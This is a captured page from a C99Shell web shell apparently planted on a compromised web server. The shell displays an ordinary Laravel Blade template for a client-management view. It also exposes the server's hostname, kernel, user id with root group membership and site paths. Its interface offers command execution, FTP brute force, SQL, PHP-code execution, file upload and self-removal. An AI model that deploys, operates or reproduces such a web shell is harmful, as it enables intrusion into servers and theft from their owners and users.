!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/resources/views/clients/   drwxr-xr-x
Free 26.61 GB of 117.98 GB (22.55%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit.blade.php (2.61 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.app', ['title' => __('Clients Management')])

@section('content')
@include('drivers.partials.header', ['title' =>$client->name ])

<div class="container-fluid mt--7">
    <div class="row">
        <div class="col-xl-9 order-xl-1">
            <!-- Orders -->
            <div class="card bg-secondary shadow">
                <div class="card-header bg-white border-0">
                    <div class="row align-items-center">
                        <div class="col-8">
                            <h3 class="mb-0">{{ __('Orders') }}</h3>
                        </div>
                        <div class="col-4 text-right">
                            <a href="{{ route('clients.index') }}"
                                class="btn btn-sm btn-primary">{{ __('Back to list') }}</a>
                        </div>
                    </div>
                </div>

                <div class="card-body">

                    <div class="pl-lg-0">


                        @if(count($orders))
                            <div class="table-responsive">
                                <table class="table align-items-center">
                                    @if (isset($financialReport))
                                        @include('finances.financialdisplay')
                                    @elseif (config('app.isqrsaas'))
                                        @include('orders.partials.orderdisplay_local',['hideAction'=>true])
                                    @else
                                        @include('orders.partials.orderdisplay',['hideAction'=>true])
                                    @endif
                                </table>
                            </div>
                            @endif
                            <div class=" py-4">
                                @if(count($orders))
                                <nav class="d-flex justify-content-end" aria-label="...">
                                    {{ $orders->appends(Request::all())->links() }}
                                </nav>
                                @else
                                    <h4>{{ __('No items') }} ...</h4>
                                @endif
                            </div>


                    </div>
                </div>
            </div>
            
            <!-- Points -->
            @if ($hasPoints)
                @include('cards::points.client_points')
            @endif
            


        </div>

        <div class="col-xl-3 order-xl-2">
            @include('clients.profile')
        </div>

    </div>

    @include('layouts.footers.auth')
</div>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0032 ]--